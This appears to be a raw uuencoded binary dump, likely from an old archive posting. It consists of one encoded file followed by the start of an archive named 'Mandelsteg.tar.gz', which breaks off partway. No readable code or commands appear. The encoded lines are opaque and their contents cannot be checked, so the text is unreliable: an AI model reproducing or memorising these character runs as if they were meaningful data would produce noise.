MQZ;[N7^ILO:\I6R`RSQ+\DS@WCA.U#"G9?TPUK"3*,Y'8^(G@J5"`,[TV+PY M'X(NKZI#9,S^3!",N@PBSH->GL43CS9.HHF@GC89:NDV3(:0NC;[#(-+)-9X M`G61+OLJFRH8\`1I-0SZFO7:QT42JRR=-47#"[.Q89'4,(C-9,A0LQ*0C&`' M*L&%G@1(/6F>C?4FT]&8&`[(2GFO8FFORNTUEB.87^)IJ#B8P-1;,"M6`MD: M;XVLD8@BBY-3IKPR63\]($3@A9?M?O"+EZ:J78D;R'276OX;\=KLW;,K2)WW M=19D>18`L/I!`O-M&ANP^`*YQ\0%H6>3?@SE(YAC.[,R@D@30<B^G>&0X:<J M"0%=>"Q;I]DF)5W8AG@%#R%88=?A7.S<%/Z9AQFIQAF"!XRE@U$4#`/((0.2 MCF`]4`JL1T"BD6[**Y7V\<L;_%OY&3E:DV7E#?B!X9MB%)F172C!2I"YBW#P MNS3W,T1#<KPW>83O'HN&"-6AZHA(1Z.ZY;<Q!^C-/7;]2`JB/PA\FH[XM<E; MP`Z`%@<ND"*8]:^".->,9^0@]:9]S[\D+G--V\\J'O1D031DU.1,""`C+`XO M,7N*TV"$6!N:2$["I[!,P0NB[G:<7^(?F;CQ6Y'$<&$:`"G!371$$3(84D1% M##:"@Y0@3;GW\KM*@""OXICM98*5!,>`WV@=],F\XI!-2YMUS&;P8()P?L8[ MA'ND62&[*?N*F`4*OUC%<(&`O`3FBGBLN,!"SIG$.ILW'5H<ZLRRF:$)/4R; M'/]H#X8P3!VZ-_LA:.V!URB?]!7+IFJANFWTTU=81[AMR!-I8F\07=*,0!M5 M*8K;EA$R3261<2GU(.%M2^<XH@+=/1K5RN(6#38#I/%3<O<DH1AF%64SE):[ MG:_V[68%TR<WI2Q"!)%/E3]NRL80,<.8#J+FA(S3.0#'SSXY/R)&2'5#&&+/ M:A/1O9^3%W@I*!(E%[8H7_253SJ%*04C9TG(=%$)+9PUT@XXO0MM<A;''JYD M/*0=BG$>604Q7U%<Q-H(D!W!#>(F>0^>D$W'@O4?_*(<=QQTK7(H6QM_L/HM M4A+M$DZ+?2-Y`88DX)3T)^`._]F[KA91_^EVKIL6+$':E2!324M3!%2Z@VQ` MFPVRMC@F9&,$39EXH`KY*D_/FGP;E=G`:(@L99;P7..E160("%>]H*QDQ(*1 M0^51#.*A+,+M=D=:W/&65'<:QPRW/!9!!,F0D9NH8N!"Z1.Q[WNT=\[R29@# M7T"<`Q+[8RR(T)'#8.A.HX4%-CEH4O":;6!V9*-TJD:,5-B2'MN`2T%/&<># MZN!X9(=D%2,J6U6(,G($!0+,7++.?APC6-BT!V9.D#-U$I#W!)K'@PGK0YQG MO0'%FPA@3(SS"3E>3"#$0@WD%Z1@"O0L)1?L74B#%%58.,)T'#^>X@OYI)BF ML06H;+6$8>%BF>)2/05G0"JT%^CB,;;X.`#$HE1,:4N(,P)$3T0)[X6M;/6( M@J'\A@()?W,?(/\"A2\!-S>-(920=W[FH!'#.\JRVCH".T_=,E!?@YQ;?D+8 M@(/##67"&K2*2J+`6VW;+)"MI)#*-T2TE`^$0^8QOZ]A&D^*"1;##G)L4[Q^ M>R<7JVJ;@B/GZNRLR\S]QI-;PX*:K2XX;EG0$PSG\ZS%R.LHC]>`O<&2CD*J M-SRRW]"&"P.0>?-KT#*\4SX"CTF04`&%/.%G,&`V)O!:RC^OR#_//ZGXY\'! MG,#GI;G,VV^8/%`<3<VG!)0W"+TBT35D=KO0*R)=@]8-4G<;6(^A5Z_?]6S# MS\QS&<6Y,XO-"Z?>3*]#SRJ*,!\)QO<XJ-9-+PQ;K0.I#`C5[S;7(9='!`89 M0<&+>)]&2$4Y9S;MK6W\9$UC^@%RMK2S@>($.1GL,MY^(E9T0*I]!Z`)@P_[ M5+AE0&D4KP#0WI[\2^ZV.^V]IN0NIKRDJCZ47=R[M@7QJ6W+;[=W"$G$J%@# MH(<`.81+)&1J)>L3^$6=T)P\?7Y""!UU$U>A&9>!4E"_G^L"?J1'01W43A@S M4^KD$X#3^1.`U0<`8LIU3&'KC)BX[ZNK2*72ZD6&S"OG#4K4;9NR3KM6#F1, M[`$5I"O>QIR/38\DGBZ*N")F8H";`BT_3EGEBYT@6=9)G/Z'P`,#MRBK6=3- M$%VO8*L^@(C/J=^:)Z4_4W.WC,RKM5D_]*++NBB[3U(^0TJ'IRIN75"J=YNQ MBC/AA1:POWQP-\SA0'U8JR`P8^JJN6JSSE=U5\K\MU&?]H;*54"$\,T4,EA! MMS284*%64\9`CI+;M*-E:IPKS\#&^<<:!D2@%1X`V*$IF4?Q;+[8+T@,@N$0 M"T';56XA?2VFBMHBILN0Q1GO>Z`(0Q)/D[+61"EO2V0JZBM5,E^6CPR@,'@* ME]PCT62DI$92]ZI*FK5EK&&U6(]&*'&;C,K$:A52#>*94=0M,:K#S*?<MIK7 M@53&X&!GW%BK<U'>8-@*IJB1XH_C!.$9@':PB@!QZH64C6:N7,>=!NF6$L`@ MSBE)^6.%>KSP^<+E-568AAIR5A3\+%N#^F:;Y2Q,\;+8V.!R32N&_>ZA07X0 M6ZCC^?X&KJD>$.K:XT8-&*42I*@X&(*;[&![K&76,"H_*6W7HZ@/TI0**EHQ M"3"!G1%'MGO`D4F9QII@Y="FL47?=$(8*,9T[)6GF@KDHE5A"^K8'G0ROG:X MU\P5S.^0+!R0'\49:C5;R\W[AJFLC2T'B$&ANJ+R:QQ/"<";$L4BGV)GU*$` MBC<&E<&AE.FX(EQ2XUEG,]HQY!K&8!?Y`V,'L=*P#7AB-`Q1D96:KLJ)&P[P M/6R!"J=^?*4LUY9IQ[.-,(I-L^[R>=W6)U@ZFP*6F38VL6_Z$:5\E;0M9&%; MR%P&F8:M$^]"C!'BN[/GIZ((W_/@B_J=VDSFO$^V2_<CHA1$A68J01IU?HZ\ MDG(+]<@`#^KPLXXAXFQ`U1$USXG!OB'.;1(,Y29FW'81A\&DA23<!S38@4@M MPD0'9"],Y+ZHE'?M,H"UN$%2K9U->))7")7$"/5(S"#HBF+8LN863E,&<7J) MO4`@)@+!*LBY8>'I>$8-7C8).F(Q^WI#P9JK3PH!93+OYPB24-LPN%;<%KKD M4[%_Y+X>M-4@%^+%R7'OU6E/5+/M<9Q0:FA:,S8^!KXK[2Y<J<QO<\`:!Z.Q M.3*!D0/^#DSB(THA0AZ4>AG%4[(TTZFBXXH4C-H#&9L,CJB@AU]0T0AWTMR0 M/#I[]_WKM]6R%O_]4UW!DE_21NAR<4NX=18AUDV)M]-XF/&7-ZQP=O@7&8KF MDPC<\Q9H0OT8^TH+).)IZKD0INA^]66W+L1?2/_50^1/=<9(Y[^[-[__L]/= M*=[_Z79V]F6GN[W3W;\___TS/@]@MR'*-E=?C6&^5W$PJ+Q=T-@4O[+/47L] M@+<VY>6!J!&0E]2/>K_=.<<U/:4^83S4N'IV\J*W98"#&^L?"%$SD1_>G_') M[R2AFX^WB/PP@4MEPP;"LTJ1(.LG8"&@5E\!=S]$]4V0VWK,_!A8<@B0D:BH M8;,=YJ4TB/@=RH8=<RA?G;UXL2E_%;7:TCJ]-*63!1!Q"UF\U[OFG-%NM^W" M-84[C2Y__0C&QZ89?"A??__NXAANGZD&0L$O*B;RY4X!X%Z=O?SQ]=NGIUNH MZC#;?!HDM,;69H-%OM64YO?F)B74Y(+F(CXT;QJ/<4")%W3"=ET9Q`_G1O&. M+XS0B7E1FW(?LR$;/KW_A<AF)(6QGQWB)O2UV7O]3)+$0)@D2?U-@.J&S]PA M'D6Y.G`/I4\RWGBP(8V,:T."_\.&;876'YHBRLLV>8J9`PGYDZ1!MS'D'6/T M^B81ZC@R-6M18/+=]R>OGA_PS8_TDRH7N8+.#U0$W$SFA][;[]:@<F2*B9OI M'#U=FY*K4FXC]E^]XW<G/_36H/>&2YN;:;UY<72\1,<.,H9?/[%'>,ZJ[4@" MZPT9''8.9/"ULU=\__SS8IE5:B4O;M,=2XNODUC#`P\K$<$],2<D_!`;PU5C M)0$V:HP)S#T6!'G9281`G,%PK7$_HM%-:3V1I4+#GAV=O#A[VRL87_;Z8ZXV MS4DGD90/-0ED>3]&.#5M"5#F?F^W=?X^.+])##R+@D2IR4![83+VV(5^K2'L M23Y!EJX+@KAFVDR89[Y@/H+C$N_/$)WU&'#`O352B8ZT^Z<Y[*60R8&@@'E) MD9+/[ZVK'PCBZ9(D!E=G0=T0&FG67:&QC(S@&?_N]?^7T+]Y"?'38HS;\=_V M_OY>\?Y?=[M#^*_;[73N\=^?\5F%__@MU@:*M9'?I)]7<E,0\*`;!X*QW!;= M?@_8]ZL0<["0<)_<,CT<.]85ZP8G\O!DE%`%C@1VP-=Y7EQR4**5Y->'LDON MNPH:?HC,$:8][GC?2GYKY>?%B<J'R/@"IA9QB;W))D.@5:S6/2AP$&\G."?P MXX"B*%%*1.G7#L'BK0'<?7L^`3]5*)Z9IA36^><2^"*)9)E$(91U:>3+-)P@ MNP=S%/@9P8ADUG#J,*H%*1.OG.@<G"Z'&3QM8W`QK(JH[\34#_5BRF@69F'# M90595V,GP(<%VR8:NFY5@?K+'KWA\R8F[^#0D%DKN54K(VNO1G6\3G:=763Q M!>XTS/A"A:R;ZI@\KP[!_8D>T7T\M@^J0=MNZ@^D[;ND/[>[RHI6M']@Q=\A M34Y7"A/B635C"1[4H6\89&O2JGP0>3BZT&FJ#324@=]_R4&F*&_H\2'7-TY^ M7.%L?+<A'SWBR7S9MX4+;91O'BY6025Z_A#Q9I\4T<:^+??F^9NY]P=-9[(` MV6YZK00>])Z3_%#OJU$0?>`S@`_U[WK/3U[A@HX^XH2ZU"Q&%]&LHW1L"4H8 M@JUG0.]BFCX2DCT)UD+UXNW7$J4XJRUBBH%0=5H90W990IU2((OCB-W%<?\_ MI6,<BX14=&K-'S"Y\RKJE%%WF!=AR2&$5GV0J#@')3J+[V6L)L=L,CF,7W#I MC]:8JT^JQMR4R+HAJ)G42%4?7-5<#.)('10)UYI]V8-9\`)^'3+/Z#05%,IL MR]#Z@)"E%%M;-<*0W%4W;W;*'+5]:`[#S$EL8YL*?JW\G-]4BM24;NM-2;CR M5D];\JF-#]&&L1=S1\Y-.+`Y=WETK0\N+U<D-:#C5>GGH4_'WB!C$@HKEF>R M.N\,#XL-D&K_@ZE66B!D%59R()LI\\=.A+CMM$$P@DW:::ZL\;(X:#PR'-IW M"[@@@#^UY%>2;:=2-X3Q5*6+-*@;M&F$U9)??D&$0*%+%';V%BGD27('A>VO M+(6=?5SM=^<I%#IYO%'.W]\^6#7D\^J0G95##JM#=E<.:6&(5;NHD>5;@%CT MKC[CFQ:K^4:-9<XRIL1]J<YUQZMH3)8:<[9L7+]6G;08_N$G4W`\MT*MZ)[- MW?VXT!:[V'!<N@:*';[0&<-SN\_N?)LLJO;)J`^&.7N+'2`;09D@%ZD\$B4J MB=FBO%HE'GQ>%.`WCEYN1%4YH0:8R0-W,$(#U^9CQ>#;V>"&UUH"X9%K,[)J M].V<%&T\+/C5G=P4H]?FZ*89=W%E%;6_!DN_2U4KA]_4=%PP]-5D*\]+CR^H MVEPH5PRGA(G[G`OML-;V>5&VF,=P14T)A0*M>2MBF_\0A=.M-,4JO8BAVW4; M$&I)GM%])K"*\>U5&BA6&VTLRIK.TE?1V:W06;67[OE!;6DS[0WYVV^RN/QV M_O*SI<4?^E+6#;BXBX?EO327R#57[F3G5BJZI/)G2]:)K_+T&R2?SB*ALBN^ M")YJED)C*>R;HD(63-7RB)\#RLUE!M=,--S,0QDG$-\,G?>/LJ`W",8Q:P&T M^$@VW7OU=`Y6,@JQ<+-2<P)M+D)(5+/OJ=W_HO?J%N!(PQB++IWBX=O"W2VD M5KY+$TEM%UX2:]ODX46C/`POZ!O8?Q`,!VHHB[_U+IY)%NN!>$!RFK_]$]^. M!L%0E/(P0)[:C<7[HE9"#C6LKHNX<4M*+$&?W6TEVMCFKCM7?&]'P#DK[KCJ M29.>0'<K'WY[XS3CP0"&2P\M.J'N!AF&8[5E#>7CS4QJ@T7^.%%[&O5H;OH. M-:38`SG%&#=87F#NSO;2G9UE)NRBW%ZSYYA%+C'J$$5GWAHB-^'G]`I"[ID] M?5C2J7ON,&FG<H_.LBSTY/S:,*9MCWV/?/KSWH9\9(>79Q&FE+#G%(N'$H00 M0<&0:GWC:K(RPAM_<;W!(H)C3X47+`8*TRM;#')0R'[W]P4YUW];=$N+2(,2 M1QB_K-[?W[$/V#-M.BN<?ZDQN6*-^=T&G^]L;R+YN966GNZ8IR80?$)Y+`:Q M6@7H+]BG?*BK_[CC-@>RSQ<0Z;DYOE]">>>+P.Q\'E*?F_/THM4A;$7L&#'& MR:\KTDMJ`#?NE*LXJ6*@8Y+*2MN[Q?0PJY3?0_]#!"4P\>JPHN%1::S\W_0[ M[JKZJ4PDVY525(IZ_A-(TUDS?_1N7GI-=>:J1]=Q^R-=!>G*7;OXJK;"7)&Z MHA^P:LX&5+$A"^YN=K:5K0#R.*J2Z_C?8<?N^^(0KLTVY/X_@4"Y\/^59'8, MF<\*&C\1#9[FW/7C?7%_7]S?%_?WQ?U]<7]?W-\7]ZN+^_D:GL^6JV]>_,$J MGB[4S[D7FF>_IZ@O6.17[<UQ%YWPO>R=GAX][_'=#]$/*J4_VW\BM]O?NB.Z M^SK\O@[_WZK#Y2<MQ`W4EE_+;A%%Z`Y[#%4)94@YA&%7/$E^7`C,7*?N?KG) M`+WS/^U=;7,;-Y+^;/R*.;M\$65)%BDIOHUCI[*YW=A5NYN4[;M<W55*->2` MY$3#&7I>K#!;_N_73S>``3A#4I)?LG?+*9<ES0"-1J/1W0`:W<=_L/HG%'\I M/)[.+CY&6S@,1%OQ\6];VFI7P1_2%HX-T=:WQ_^]J2VLN$<?U-;C^[W6D-EP M^"#0C[:!/N\!;2L^LQ4MZ&&_C=0YG/X>-^QRW'+*S1GH0UDVIP-/G?WNVPJA MGMJ\EW)^.QW[_F-N6*PU&6@E[(9W=1+K(&ZSSU&6KY;`X0BZT;^#<6"N9NBA MO:2A1Q&4\#TCC/30NIM!B]!'^]>@V\GO.`8>P..N&39+1+\Z;QCN8JGKILP/ M0G=F3Q:3J1(JYP$A,3A^;D0K1-YZ`3UJO_?@]>]\0QL['3:,T<.$_@G]U3T7 M!6%KPT=;F[UY]ZR"ZT)#6Z);^EMB3I$=G4&GCZ]Q;=1BVEY)YY!N-R6_"CZ^ M_H_OOB,6BXRE!LYQMW(BRS<<%,GR"\RVI_*3;PB#(_D7J]Z"FQC&HO,O8DCA M1V:[I4L&M&8(`:_6P^AL:/=,=I5]YFM^YX`AO99F'U*)]C;3((++B9U3K6$0 M'3^W8FU;DT="`3/U+%WM.YZ*XBWEW6#JT%08AO]\UBKZUC_58O7@P0.9DP*' M_K0C[LLCUX?A164XY=G#<T12K)X]'+G90,_6CFTM81AP:QEJC[];IGNO/L'X M<SC@3^QCOL/_?S3Z\LSY_S\Y/T/\7_JQ]___'$_K_\\QH^];#VM(MNC0O];( MJ\5,KG.GO]&"#2_DMXV!<^2ZHGY[.6WR2>>6X\Z*+$;?D22P4_IH8P5SY]&( M"4%3JI%V@HR@,G[/6.,_=;=:V]^PB%G8O2F\6<2_/K5WR473MT1@<<-3D,4* M/:3[^8-YUK[35]<#0Q5;S`*0APK:SO=^CP9_-X`ZUF4[9E]%[(I[%)5ZHM-W M9$^QJ4%&!^G`6I<G[I($/5:C'?A4&K""^].K5S^\BEQ)\<6W-U_7RB,L7C%9 MOP1+'P>1,;RBOR+4$,>"`*%,%!$!-QP]1(C&(!:H_G6I)S4C;Z-<0E.PX[,- M+E`5+KCN6$?_=G'\A].'$:+S>D$A.,1@L:S31;,X,50T@%YQ[!^$LZ4R"`.Q M0'S2I43W&9URC)&<([T\X;:N38R"M$8,*7IM`7&PW&*AL;''46HS#B>!,%O@ MJI-HYR-7P)@:Q\_YAV4GF'-\N,(O'D4GP]$A?AT\'IT.#D>G].K)4Z\RD>LR MI:5P)95/_6_4RTO]UO*H946_!'.?XV+'C'X1F6M$=RD23#V_7'4I<2\O[3(@ M"CX"3VP%51TLFVT5FRT5296W<_"9/V%Y64,#]1,"KDG<J1XVE"&+9=`LWR'T MR5P"$MGAKO2DX%A@U3P"`3E>A`TL;6*8W:]JO;POC7A1Y#SNX_#>$L':!@@% MV^=U6AJ$MO(->QK;334GOMJC`.FM#1/$?-OR%<)'Y,S"TLLC#@H55XCC(W%J M$6]"UO4D".T!7Y=!'T>\I6L-US,8KI"<9+0^&]E#"1:?G:H//7\"G-[!]U]Z M8;83.C7(\#$;R*U;N/59<*X(SPE7PN!X-'#-.]GN;[AZ?`,.KUJFY]OV)-,X M!)TOU##KCKH=84]NGPW]86KM4@<NT*8]T!@U:Q'CO;6(@5=P;Z:CV2(7LP&& ML8AJ>QG*0'22W32$@%8'/B%$X/NO]?JK$$=O,138[H?^[IQ9/$O7CS9@;NCH M'=Z;OS"9+F4BFS<P=5O1Q&6<T"`3^ZFC0A20(3(W"Z,-&E30_0H1:,"/$EH^ M;_T`:**S,I7YV:M([7#[A)8B[UND#"$^!"W"1K80!-3=D`F(9LZHP<F6NN#? M0U\W#`ZLE64(C]6N,#K:>$$R<7C@JG?Y6ZJY\?2JC794X]`?1MZ%:'_=,XL< M/<T/IOKA@2QRL52R<_41YCMUPO92E,@@\LY5W60F*?5GMAD0%'ZQ1+SNK*B- M'?*%Q$_G6&SN1O<&K8;#T9!=N\6=GL,6G/O<.[)FGV+@E;,WR=L39'^.F]-= M4,Z-](:><N`F)._A<?D_T=/VV\&AE6%B^@P&;NH="2L$G-#'"/UD2>N^GE>W MZWFUJ^==7NW!,-I(C!!QB47(AL!*4_=9B*0DSS@/2R;7]2K]MN$PF7[O/"<? M_/*HG;X#TN+K<\_#)NA_T$61/O@%J"%FGTQM!(SC1"%<$T&UYT5F[3,3_^?& M;-;/8)[FZN4MT>>$U4O+Z+7E=/5>OI@8@ZUD%H]KJY]MK(H;Z;R[*3SA#)QX M72[K<I,.C-PR]V[:4#KR`=KP8^K`-61,](Y=*O"6BL_93;XR(037%U=WPC5% MO.'I3H*MR[CWCF*^0>78RD9`L6>=Z]Q\%TR39IE)5,<=I.WB^O_&?%!.<KZ< M!MI>8L=Z"N!#;(M`1'.<Z&;&WHM5U";0X$V*A%:GJUH?CU?'^.FOUK#\\@4V MUJAMF&.D1C''CMPYOV1PXA!@V9X[1-ZSK9?18;363])7Z&MGO\]".1Q8&?"( M#T'],N^#OSJZ,S!CGJU)QZ"DF[.!`II.LZ::'TA,T$%7^8:+F@Y6MS*K>$#^ M6-#TJK!/1L;4K%E9;69P-9+<.F#X>VH=;1\,-$?P1BRA)2>Q&%,S^D/'V&&# M82&4#@^ZMM*6,;_A2,)C5\0-(UW^TS"F;R-84CLY[O,H+[A-@3ORJ$>E3VO& M13L,.0XHW37FO+-Q/R87AR%&A%H1N9QHAZNE8I)!BYJP79;`OB.`31,5VZ1- MUJ4NVJ"]V+);,^UDB,2T:S<T7NE%\4[??$/C]K:=.>7<8=O=S:(3[/_A]C?6 MT"KYS_WVQDWL$S[<_0C+W/Y5+J_X5P@)LK[B[2JLW7+7DQRWDM>#R#]/VZ+B MCX][EM$.U8^[/^*6AR9I@!-K'00VK#)OM&KGB1!SW/=/OB1W,^?>+LR#[6B9 M%#9,L#T>)GK![07>(8>DZ+UDDNPWA[R=[J!,$JP5+/!G*2D.Z=\).X=XA$RI M;]8(6L=@U(.!C\`T<B<?<LP@JD..9=`H,DL2$:78U^LG-PS$/[*QF4P]G=;! M5S"6D[OC:#B`X3$TN#-E68/7<5UMVLN/(L^A\0V_!K2OK(]-O_QQ3D^D/#G" M?Z:3]2KM4C:H\F=[GL5I%7594;U?Z9]?582,^U,$9P#E#3NJ5`VO59'%A,DE M3$<`IU&$2.KXA;=EQ+4F:I^>_;2C]J7;SC%">GK0_21N8&XR.3]#DU?/1TT. MWUKD.MCT(_1X$SYV+H7$:/(/)D?31XYF,SF:&Y,C1.X6!&EZ"-+!R!)D?<T5 M3`-QR=QN1HF6;">-/8SR>O02@D,3"4VJ`F<V]"TH6@&)-467/)@_T<,SFCM\ MQZ9="6Q=\?>IK\`?)-`DGN^JV67PL0Y%\[I^:*_)B#8(9[C19#_[D+S]+7>. M[P6_]$>X-2IL29@5-^MQH-VB8,WTOF^*=`9KC5/`*OOQ_XCCSUY?G]C';+O_ MW_#T?&3\_\Z?G)]=/!'_OXN]_]_G>!X?DCE#CSJ47Y@?HJW/#T@-10MY&%N1 MF")9.D:"(@/$PN+%M_F$]3=2T5<19Q2>XJH?%IVTU)QR0KDH+L=I34536(3( M!VW!M`FH$4S4^$Q8AYWVH\V^8U>Q1S8%G(43[H1RDF?;YJK]:#W&V#%6\O,A MV3*GP[&0Q(FF=1TZX0_VZ\LV]:]DKC)_Z\1+('PD6Q*<")#3425ZDG$^+]>* M,;PD2>[]5B'>-VEB>=L77]/:2YPEF9GA8H+4PP94ZQ-X8H:G^Z5-TLP!#HHL M*ZZ)C%\Y?.@9#B1E%!O0.6]#NY&PWBPF6:WQQ4,FJ1,?Q&@0?1O-BB*)=%6G M2'G/:6J)H)SHV8-B5U(65%47)>>4]J"=`5I`J-8/BX<1:14KSEDEZPD'GS.3 MM8`@5+$<2>O5D3';L1-RBHT07$9AS@#9AWACC*0`E?,!AG0+*KCOT8!@G-2H MUO!R%($]CI%O*\3&Y#)#7K8FR'/E\K#9#1&;##T`&0(S:RZ:?Y)9D).M<;K0 MWW19`-N+X]&I)*;N]XD[\0!>T#)P69M\S$<[>LVJR?0Y24D$$)'7Z&[Z$?#E MMU,&B(XQ+W/^R83&H#WZ.O(VYV1LVATD"`,+:MQF^R,62Y=-9E))279Y?]7> M@H$5BM"NSL:PT(R4,5E)"68QKI'XGM1(W53!0''&QAX2_L29QQU_\TXF9W2C M'D/6($BMY][5;1+[P188YT6C/I,,,XO4&+GXL@*G=IRPS)O\J/0844",T_?7 M9%BEQ<G\N?=J.LGK#*_4@T1/$4"D]0&.HN-A\-IN!9P&;^V-F&'@3<[V"F]@ M1)%G<*T].+*RS.=MI)AZ;K':5\\)D8J7NYS5$SN'`@$+![)ES<;8NB^Z1#[U M&-E*@Y:?`S!FD["M[2/B@7&UD55.U^TNL`$7^*VG=1?B9G!<QVVP>N"BPRY9 M^\$A'R.?%CFQZ'4R.F3#L1?4!C#2,ZK5:`MJFA6D#B)_P?QT'91<9S&[G-#- MX0*Y`\HM*Y]VL)+Y(S:%7>+[R]@05',;K#H+]VH=V(?C)82/[`%7+^'M]'!C M]J^&X:>2L7)A8+V/X.TL09XC$0`5RS=1;]6ZX,ZU\0QNC:$31'CVE^)JZXV0 M+JZOUW'UO.?];<P;/&:"C].92')[B8"['H6GJ(:2O5BUX%Z$\B)X^L!MN\E" MX'[LFZ:PA:+H#GT5P\5)(8A#,F(<<K>$YNC?\_1W%7/?ZRSZV(+[N%UU_+AN M%]T)VM3DIP[LO;:K?NG@CTV2.#*RF$!;JZ=7(M\!U=!"0@[)6:9]B6YGK[$$ M*C,_.04JV0"5T?P\36_B%.Z"OD?&7<V<REK`3+MH0@853!J+R$:9P2G$#QUW MP5ZRY7SC()W*42V.DAC5NWB%&V'H.F`.9<FBKES[,.7$C-N`!IL#A*5S:SKB MK13`\VL8^R4@Z\U]^5HB&UNTU)*.VN')Z3AY!R@T/C=@#5".@$>2J_4ZY02> M4EY6?V@K\:SIQW<ZK&ZQ_U'X$I'5W(J;RRRSII+U,XS>JFUJZ_9M![#DJ9_W M0ME\%L)@`.6%?^NF"L9JTT'4TYT'1="8_U3C;P(8?=(])NS_?;DM_^O%^O[? M\/Q\G__KLSS8SKGD\"'1I40#B2[Q?V7E^Z6+&Q)=<EB1$_52B@2?&(2Y9+E> MK0OA-0D/WFPX<C4%Y%C/D?6E4X4*-GD&C85TXE^4?@,GZF^(T=DBQ3_%A6)5 M-%P8KR3#>UDTLSFIL0[R)^HG'=*`UC7L_;"M+R1X?N*67#]\")*=WGXJIB1( M#6BSO=,EX8GZ@7-Q;VC4@.(]L;4.0Z@X(-\7Z.Y89V3CQ@97*1+;\4X=1AXI M7\1\`-Y#G3=]Z$8EK:>SE>$9*J2Q[]A;DJ^+!-3A'.HSLC2JVF%UHOX*X^W6 MO4=\4MOW-WQ]TZM7!.3DVI,86[,]L`$($&E<48X8R+2TA:NEZC?J+YK[R,5[ M9X+E923I3O@:1C]LUY-=;:XS;+4!E.L3WV!(*X\O[;*Q6^L;]7INME_#9J[M M!E9/0]CDV"PZOB\LIJ;"ORAVG^%#`:]\723QZBAZ^<7Z0.^FB95??)+>BR3) MGSGV%*^UDSI3Q(O=1KIOU,LOR`J.96Z&K(>;ZI?M'.R=/2^GF\#SIO]8;AT' M@(\VU5C$*SN>K?AN1:EL8@;@900MG#B0:33C5CU4O/;8TXC>E[;5%[IO"J93 MGZO2BNM[S>S'_Q]P_$W6ST]J8^RP_^C=N8O_@@]D_YT-AWO[[W,\#])ICHC@ MEY=O_O1?;WZX?'%YZ;;R_7?;SPSH59:.-YPC^,7X`,]_Y\+.V$9-M*MH>.%> MV6!3T9<72B*=<JRZBY__QW[YV0M[ZJJ)-,#3GDZ('82G/<?@.<?/R+TS4YN> M,^^=G4#G*@R+^G=UKR\`*X>/L6[:_,>RJ,QOQA/\WGM"6'+FFD"H-H6N69B9 MA+D<"/!I&)Q'HM9QJLQ:E[FL[<+DI/Z7,+FH_R7(>.A_"),7^E^"#*8]'TSZ M4_,E70^F%WYRT=(Z[;=!OSC5JHD:OQ__CS?^7/03RY@=\O]\=/ID??U_^F2_ M_O\LSP,X#^2S2DW+8J:6.E=Z-E/CHKA2D[A4";V<9D51JDE6-(FJ<?*<I-65 M^F-*S*=^B2=7NJ;ROZIQV51S5<=+K>*R+*[I95PKG,-?Q_5DKJIYH0$SH4JE M6J:YHE507>1J%B^TQ)/6U$Q<40/EBGZMXF:B59UR"],T6P!80HU6_*XDE%$S MT83-DIHME<[?T8)WB6:6:DZM5_.T).P8L>N4^E<4F5HV":"4M/!,RF*IJ@5U M<@)<:;4/'%;%+%77A-`5%:OCF8HG<X)93*?H/#&,TMF8.JCS=+:(.5.QHA61 M&I.=I<B2O"+4\^0ZI4XWV80`UJLRSFO5T-Q42$*K'D3_J<MQ%:FR(8(#T04M MG%6I)T6:J2I/IU-U19VD]RGA@+T[Q?ON0*LF"ERG"U6FA'N6$CC"@)"J"+K. M?RE6BFSW!,W2R%Y)KP@%(@M"`"G>BU3(>ZTXS;/BXTL:)")2(F<'U#9ALXAQ M'`'"$?`)G_FIMPV\=FC0$"8+%%3R?T:KW5Q55RE^HZ\%U2\:JHHQ*(I:76F] M5!GZ,6^8I:YIE'5,8YJEBS&06JF,&M(`C3\J[.FHBLK5J/^.1#^]([#C9D5# M2,@N&_P%N$E<7H%S\UF334E>3O6$6LS!@SI+"9":E7&U)%+D.3X]B'[D#5DU M1S_+HE@H+`BNJ=DQ7&N`%(U`=;7"QRDQG\X2E<6Y5M;3C9@A)3(F-#50;0$B M@Q`59DA-9:_`,65.?1CKA)L@09.D#7[28H.Q+/."AK6D!L<Q=J:H$+*0$-Y$ MM&NJBI`;`$_CHHF1K]*">+UBN4]5B.+S@N02WO"@+$`'S+DIO4MG.?\79_A> M@L0Y?5P45+"BL<PRYB1[U*NJMPVM%8A_D4::R/(.[B8K3,@:<^XZ7BS!W#3N MZI>&.:-,,412K"R(M?*8YI]**VHI(2&@\QA3=D4-3JBY&+,;#(!IDA0EYO," M@T(`9L21&"OJWJ+(&^Q.XY>"<)RK8@*>(OR)O@^B;Y-WF#L*.7"R%7$DS1/Z MF<6_I?2CBI,,]-)+^C&/ETN\U'&52E%=HRA),OI![`UG0X63--2LV2T*O^4Z MOL(7<#Z.C%8*NSDHFI8+O*?O4J,@0M`O1/B:7S3+%*"K9LQ_-R25QO0+$9G^ M'Z?4I7H._!BHUM)^3),\%?C\?J'+28H5-T"DBR6WJ-%BJ8G#N635E"0R^<00 M/<G%TW%)>*3\&Q%Y.B>D:YTPWNRKI=I[*S27]$)J4]]J*4,,`329A!G).6!7 MIC/N4DVREGXT58P.34HRWN6GM@US#PVB8YI?^!DGB[0T2(ZK(FNXA7ABD(@7 M-&K\E=8#I4Y2P&YRF;7<4*D%VZ;DUFER$&GYBU>(Q`9-+?IE1FC-!.!UG//_ M]$VH"L[YA68_,6U%^#6DIJ"(<GU-U32)CX;Q@&H05<?2/"/12!)+F\'FH:<Y M2Y.3H(H42#'#-*%?"X=A)J75'&-`RJXJIC7U(E&<'!I-K:#\KM1*P\.2`-;0 M=XKS;8M$1B62ZVI&LH=(S&<U8'_H/5*S)!.H"BD`<)&"V;C")$JH,N9)1<TN M95I@4C!1%LN5*'`27(D4+$D%Q"3.::[D$"',:UD[#XCY-:$O_H>D44AMY3+Z M-/&QAP[EFF-(P!E$KF8,UL3?18.+OC3@*UQS)]ZHYQJHDPZOY\"U6O#?P+D8 MUY!@^_'_G<;_][8_]\_^V3_[9__LG_VS?_;/_MD_^V?_[)_]LW_VSZ=]_A<5 '``U5`,@````` ` end sum -r/size 12165/11797 >>>> MANDELSTEG <<<< begin 644 Mandelsteg.tar.gz M'XL("&H<NC0``VUA;F1E;'-T96<N=&%R`.Q;;6_;1K;>KQZ@_V&:(M<OD17) ML1VW3K)P;"4QD,2!Y32;VQL8E#24N*%(7I*RK&[[W^_SG)DA*<E-=W'1+A:( M@3829^;,.6?.><[+4)>]D[,WO;_\H7]:Z\-.1_-?K1^M_*OW'NWM=;4^.-CO M[!\>/GJTAV?[C[M[?]%_+%=?__BGU,;&FR`9F;A?FK'^L=ON:'S5+\]?]&[+ M/!B6\@RS=G__3ZFKB2F,+N>ISO)TG`?30@=QG,[U(IWI,M63:&3T,$U"_)N4 